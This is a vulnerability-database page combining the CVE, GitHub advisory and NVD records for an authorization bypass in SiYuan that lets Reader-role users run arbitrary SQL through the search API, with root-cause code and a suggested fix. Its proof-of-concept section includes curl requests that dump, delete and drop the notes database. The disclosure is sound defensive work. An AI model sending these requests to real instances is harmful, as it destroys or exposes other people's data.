Vulnerability-Lookup

CVE-2026-32767 (GCVE-0-2026-32767)

Vulnerability from cvelistv5 – Published: 2026-03-20 00:13 – Updated: 2026-03-20 14:42

Title

SiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API

Summary

SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the Reader role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database. This is inconsistent with the application's own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CWE-863 - Incorrect Authorization

Assigner

GitHub_M

References

URL

Tags

	https://github.com/siyuan-note/siyuan/security/ad…	x_refsource_CONFIRM
	https://github.com/siyuan-note/siyuan/issues/17209	x_refsource_MISC
	https://github.com/siyuan-note/siyuan/commit/d5e2…	x_refsource_MISC
	https://github.com/siyuan-note/siyuan/releases/ta…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	siyuan-note	siyuan	Affected: < 3.6.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32767",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T14:42:43.938307Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T14:42:49.764Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "siyuan",
          "vendor": "siyuan-note",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.6.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user \u2014 including those with the Reader role \u2014 to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application\u0027s database. This is inconsistent with the application\u0027s own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-863",
              "description": "CWE-863: Incorrect Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T00:13:31.384Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/issues/17209",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/issues/17209"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
        }
      ],
      "source": {
        "advisory": "GHSA-j7wh-x834-p3r7",
        "discovery": "UNKNOWN"
      },
      "title": "SiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32767",
    "datePublished": "2026-03-20T00:13:31.384Z",
    "dateReserved": "2026-03-13T18:53:03.533Z",
    "dateUpdated": "2026-03-20T14:42:49.764Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-32767\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T01:15:55.597\",\"lastModified\":\"2026-03-23T15:23:44.380\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user \u2014 including those with the Reader role \u2014 to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application\u0027s database. This is inconsistent with the application\u0027s own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1.\"},{\"lang\":\"es\",\"value\":\"SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Las versiones 3.6.0 e inferiores contienen una vulnerabilidad de omisi\u00f3n de autorizaci\u00f3n en el endpoint /api/search/fullTextSearchBlock. Cuando el par\u00e1metro method se establece en 2, el endpoint pasa la entrada proporcionada por el usuario directamente como una sentencia SQL sin procesar a la base de datos SQLite subyacente sin ninguna autorizaci\u00f3n ni comprobaci\u00f3n de solo lectura. Esto permite a cualquier usuario autenticado \u2014 incluidos aquellos con el rol de Lector \u2014 ejecutar sentencias SQL arbitrarias (SELECT, DELETE, UPDATE, DROP TABLE, etc.) contra la base de datos de la aplicaci\u00f3n. Esto es inconsistente con el propio modelo de seguridad de la aplicaci\u00f3n: el endpoint SQL dedicado (/api/query/sql) requiere correctamente el middleware CheckAdminRole y CheckReadonly, pero el endpoint de b\u00fasqueda omite estos controles por completo. Este problema ha sido solucionado en la versi\u00f3n 3.6.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"},{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6.1\",\"matchCriteriaId\":\"E1AA6470-222A-4841-A487-DF65F9859780\"}]}]}],\"references\":[{\"url\":\"https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/issues/17209\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32767\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T14:42:43.938307Z\"}}}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T14:42:29.289Z\"}}], \"cna\": {\"title\": \"SiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API\", \"source\": {\"advisory\": \"GHSA-j7wh-x834-p3r7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"siyuan-note\", \"product\": \"siyuan\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7\", \"name\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/siyuan-note/siyuan/issues/17209\", \"name\": \"https://github.com/siyuan-note/siyuan/issues/17209\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5\", \"name\": \"https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1\", \"name\": \"https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user \\u2014 including those with the Reader role \\u2014 to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application\u0027s database. This is inconsistent with the application\u0027s own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-863\", \"description\": \"CWE-863: Incorrect Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T00:13:31.384Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-32767\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T14:42:49.764Z\", \"dateReserved\": \"2026-03-13T18:53:03.533Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T00:13:31.384Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-J7WH-X834-P3R7

Vulnerability from github – Published: 2026-03-16 20:44 – Updated: 2026-03-30 14:00

Summary

SiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API

Details

Summary

SiYuan Note v3.6.0 (and likely prior versions) contains an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the Reader role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database.

This is inconsistent with the application's own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely.

Root Cause Analysis

The Vulnerable Endpoint

File: kernel/api/router.go, line 188

ginServer.Handle("POST", "/api/search/fullTextSearchBlock", model.CheckAuth, fullTextSearchBlock)

This endpoint only applies model.CheckAuth, which permits any authenticated role (Administrator, Editor, or Reader).

The Properly Protected Endpoint (for comparison)

File: kernel/api/router.go, line 177

ginServer.Handle("POST", "/api/query/sql", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, SQL)

This endpoint correctly chains CheckAdminRole and CheckReadonly, restricting SQL execution to administrators in read-write mode.

The Vulnerable Code Path

File: kernel/api/search.go, lines 389-411

func fullTextSearchBlock(c *gin.Context) {
    // ...
    page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)
    blocks, matchedBlockCount, matchedRootCount, pageCount, docMode :=
        model.FullTextSearchBlock(query, boxes, paths, types, method, orderBy, groupBy, page, pageSize)
    // ...
}

File: kernel/model/search.go, lines 1205-1206

case 2: // SQL
    blocks, matchedBlockCount, matchedRootCount = searchBySQL(query, beforeLen, page, pageSize)

When method=2, the raw query string is passed directly to searchBySQL().

File: kernel/model/search.go, lines 1460-1462

func searchBySQL(stmt string, beforeLen, page, pageSize int) (ret []*Block, ...) {
    stmt = strings.TrimSpace(stmt)
    blocks := sql.SelectBlocksRawStmt(stmt, page, pageSize)

File: kernel/sql/block_query.go, lines 566-569, 713-714

func SelectBlocksRawStmt(stmt string, page, limit int) (ret []*Block) {
    parsedStmt, err := sqlparser.Parse(stmt)
    if err != nil {
        return selectBlocksRawStmt(stmt, limit)  // Falls through to raw execution
    }
    // ...
}

func selectBlocksRawStmt(stmt string, limit int) (ret []*Block) {
    rows, err := query(stmt)  // Executes arbitrary SQL
    // ...
}

File: kernel/sql/database.go, lines 1327-1337

func query(query string, args ...interface{}) (*sql.Rows, error) {
    // ...
    return db.Query(query, args...)  // Go's database/sql db.Query — executes ANY SQL
}

Go's database/sql db.Query() will execute any SQL statement, including DELETE, UPDATE, DROP TABLE, INSERT, etc. The returned *sql.Rows will simply be empty for non-SELECT statements, but the destructive operation is still executed.

Authorization Model

File: kernel/model/session.go, lines 201-210

func CheckAuth(c *gin.Context) {
    // Already authenticated via JWT
    if role := GetGinContextRole(c); IsValidRole(role, []Role{
        RoleAdministrator,
        RoleEditor,
        RoleReader,       // <-- Reader role passes CheckAuth
    }) {
        c.Next()
        return
    }
    // ...
}

File: kernel/model/session.go, lines 380-386

func CheckAdminRole(c *gin.Context) {
    if IsAdminRoleContext(c) {
        c.Next()
    } else {
        c.AbortWithStatus(http.StatusForbidden)  // <-- This check is MISSING on the search endpoint
    }
}

Proof of Concept

Prerequisites

SiYuan instance accessible over the network (e.g., Docker deployment)
Valid authentication as any user role (including Reader)

Steps to Reproduce

Authenticate to SiYuan and obtain a valid session cookie or API token.
Read all data (confidentiality breach):

curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "SELECT * FROM blocks LIMIT 100"}'

Delete all blocks (integrity/availability breach):

curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "DELETE FROM blocks"}'

Drop tables (availability breach):

curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "DROP TABLE blocks"}'

Compare with the properly protected endpoint (should return HTTP 403 for Reader role):

curl -X POST http://<target>:6806/api/query/sql \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"stmt": "SELECT * FROM blocks LIMIT 10"}'

Expected Behavior

The search endpoint should reject SQL execution for non-admin users, or at minimum enforce read-only access, consistent with /api/query/sql.

Actual Behavior

Any authenticated user (including Reader role) can execute arbitrary SQL including destructive operations.

Impact

In a multi-user deployment (e.g., Docker with published access, or any network-accessible instance with access authorization code):

Confidentiality: A Reader-role user can read all data in the SQLite database, including blocks, assets, references, and configuration data they should not have access to.
Integrity: A Reader-role user can modify or delete any data in the database, despite having read-only access by design.
Availability: A Reader-role user can drop tables or corrupt the database, rendering the application unusable.

Suggested Fix

Add CheckAdminRole and CheckReadonly middleware to the search endpoint, or add explicit validation that only SELECT statements are accepted when method=2:

Option A — Restrict method=2 to admin (recommended):

In kernel/api/search.go, add a role check when method=2:

func fullTextSearchBlock(c *gin.Context) {
    // ...
    page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)

    // SQL mode requires admin privileges, consistent with /api/query/sql
    if method == 2 && !model.IsAdminRoleContext(c) {
        ret.Code = -1
        ret.Msg = "SQL search requires administrator privileges"
        return
    }
    // ...
}

Option B — Enforce SELECT-only for non-admin users:

Validate the parsed SQL to ensure only SELECT statements are executed when the user is not an administrator.

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260313024916-fd6526133bb3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32767"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863",
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T20:44:52Z",
    "nvd_published_at": "2026-03-20T01:15:55Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nSiYuan Note v3.6.0 (and likely prior versions) contains an authorization bypass vulnerability in the `/api/search/fullTextSearchBlock` endpoint. When the `method` parameter is set to `2`, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user \u2014 including those with the `Reader` role \u2014 to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application\u0027s database.\n\nThis is inconsistent with the application\u0027s own security model: the dedicated SQL endpoint (`/api/query/sql`) correctly requires both `CheckAdminRole` and `CheckReadonly` middleware, but the search endpoint bypasses these controls entirely.\n\n## Root Cause Analysis\n\n### The Vulnerable Endpoint\n\n**File:** `kernel/api/router.go`, line 188\n\n```go\nginServer.Handle(\"POST\", \"/api/search/fullTextSearchBlock\", model.CheckAuth, fullTextSearchBlock)\n```\n\nThis endpoint only applies `model.CheckAuth`, which permits **any** authenticated role (Administrator, Editor, or Reader).\n\n### The Properly Protected Endpoint (for comparison)\n\n**File:** `kernel/api/router.go`, line 177\n\n```go\nginServer.Handle(\"POST\", \"/api/query/sql\", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, SQL)\n```\n\nThis endpoint correctly chains `CheckAdminRole` and `CheckReadonly`, restricting SQL execution to administrators in read-write mode.\n\n### The Vulnerable Code Path\n\n**File:** `kernel/api/search.go`, lines 389-411\n\n```go\nfunc fullTextSearchBlock(c *gin.Context) {\n    // ...\n    page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)\n    blocks, matchedBlockCount, matchedRootCount, pageCount, docMode :=\n        model.FullTextSearchBlock(query, boxes, paths, types, method, orderBy, groupBy, page, pageSize)\n    // ...\n}\n```\n\n**File:** `kernel/model/search.go`, lines 1205-1206\n\n```go\ncase 2: // SQL\n    blocks, matchedBlockCount, matchedRootCount = searchBySQL(query, beforeLen, page, pageSize)\n```\n\nWhen `method=2`, the raw `query` string is passed directly to `searchBySQL()`.\n\n**File:** `kernel/model/search.go`, lines 1460-1462\n\n```go\nfunc searchBySQL(stmt string, beforeLen, page, pageSize int) (ret []*Block, ...) {\n    stmt = strings.TrimSpace(stmt)\n    blocks := sql.SelectBlocksRawStmt(stmt, page, pageSize)\n```\n\n**File:** `kernel/sql/block_query.go`, lines 566-569, 713-714\n\n```go\nfunc SelectBlocksRawStmt(stmt string, page, limit int) (ret []*Block) {\n    parsedStmt, err := sqlparser.Parse(stmt)\n    if err != nil {\n        return selectBlocksRawStmt(stmt, limit)  // Falls through to raw execution\n    }\n    // ...\n}\n\nfunc selectBlocksRawStmt(stmt string, limit int) (ret []*Block) {\n    rows, err := query(stmt)  // Executes arbitrary SQL\n    // ...\n}\n```\n\n**File:** `kernel/sql/database.go`, lines 1327-1337\n\n```go\nfunc query(query string, args ...interface{}) (*sql.Rows, error) {\n    // ...\n    return db.Query(query, args...)  // Go\u0027s database/sql db.Query \u2014 executes ANY SQL\n}\n```\n\nGo\u0027s `database/sql` `db.Query()` will execute any SQL statement, including `DELETE`, `UPDATE`, `DROP TABLE`, `INSERT`, etc. The returned `*sql.Rows` will simply be empty for non-SELECT statements, but the destructive operation is still executed.\n\n### Authorization Model\n\n**File:** `kernel/model/session.go`, lines 201-210\n\n```go\nfunc CheckAuth(c *gin.Context) {\n    // Already authenticated via JWT\n    if role := GetGinContextRole(c); IsValidRole(role, []Role{\n        RoleAdministrator,\n        RoleEditor,\n        RoleReader,       // \u003c-- Reader role passes CheckAuth\n    }) {\n        c.Next()\n        return\n    }\n    // ...\n}\n```\n\n**File:** `kernel/model/session.go`, lines 380-386\n\n```go\nfunc CheckAdminRole(c *gin.Context) {\n    if IsAdminRoleContext(c) {\n        c.Next()\n    } else {\n        c.AbortWithStatus(http.StatusForbidden)  // \u003c-- This check is MISSING on the search endpoint\n    }\n}\n```\n\n## Proof of Concept\n\n### Prerequisites\n- SiYuan instance accessible over the network (e.g., Docker deployment)\n- Valid authentication as any user role (including `Reader`)\n\n### Steps to Reproduce\n\n1. Authenticate to SiYuan and obtain a valid session cookie or API token.\n\n2. **Read all data (confidentiality breach):**\n```bash\ncurl -X POST http://\u003ctarget\u003e:6806/api/search/fullTextSearchBlock \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Token \u003creader_token\u003e\" \\\n  -d \u0027{\"method\": 2, \"query\": \"SELECT * FROM blocks LIMIT 100\"}\u0027\n```\n\n3. **Delete all blocks (integrity/availability breach):**\n```bash\ncurl -X POST http://\u003ctarget\u003e:6806/api/search/fullTextSearchBlock \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Token \u003creader_token\u003e\" \\\n  -d \u0027{\"method\": 2, \"query\": \"DELETE FROM blocks\"}\u0027\n```\n\n4. **Drop tables (availability breach):**\n```bash\ncurl -X POST http://\u003ctarget\u003e:6806/api/search/fullTextSearchBlock \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Token \u003creader_token\u003e\" \\\n  -d \u0027{\"method\": 2, \"query\": \"DROP TABLE blocks\"}\u0027\n```\n\n5. **Compare with the properly protected endpoint** (should return HTTP 403 for Reader role):\n```bash\ncurl -X POST http://\u003ctarget\u003e:6806/api/query/sql \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Token \u003creader_token\u003e\" \\\n  -d \u0027{\"stmt\": \"SELECT * FROM blocks LIMIT 10\"}\u0027\n```\n\n### Expected Behavior\nThe search endpoint should reject SQL execution for non-admin users, or at minimum enforce read-only access, consistent with `/api/query/sql`.\n\n### Actual Behavior\nAny authenticated user (including Reader role) can execute arbitrary SQL including destructive operations.\n\n## Impact\n\nIn a multi-user deployment (e.g., Docker with published access, or any network-accessible instance with access authorization code):\n\n- **Confidentiality:** A Reader-role user can read all data in the SQLite database, including blocks, assets, references, and configuration data they should not have access to.\n- **Integrity:** A Reader-role user can modify or delete any data in the database, despite having read-only access by design.\n- **Availability:** A Reader-role user can drop tables or corrupt the database, rendering the application unusable.\n\n## Suggested Fix\n\nAdd `CheckAdminRole` and `CheckReadonly` middleware to the search endpoint, or add explicit validation that only SELECT statements are accepted when `method=2`:\n\n**Option A \u2014 Restrict method=2 to admin (recommended):**\n\nIn `kernel/api/search.go`, add a role check when `method=2`:\n\n```go\nfunc fullTextSearchBlock(c *gin.Context) {\n    // ...\n    page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)\n\n    // SQL mode requires admin privileges, consistent with /api/query/sql\n    if method == 2 \u0026\u0026 !model.IsAdminRoleContext(c) {\n        ret.Code = -1\n        ret.Msg = \"SQL search requires administrator privileges\"\n        return\n    }\n    // ...\n}\n```\n\n**Option B \u2014 Enforce SELECT-only for non-admin users:**\n\nValidate the parsed SQL to ensure only SELECT statements are executed when the user is not an administrator.",
  "id": "GHSA-j7wh-x834-p3r7",
  "modified": "2026-03-30T14:00:31Z",
  "published": "2026-03-16T20:44:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32767"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/issues/17209"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API"
}

FKIE_CVE-2026-32767

Vulnerability from fkie_nvd - Published: 2026-03-20 01:15 - Updated: 2026-03-23 15:23

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5	Patch
security-advisories@github.com	https://github.com/siyuan-note/siyuan/issues/17209	Issue Tracking
security-advisories@github.com	https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1	Release Notes
security-advisories@github.com	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	b3log	siyuan	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
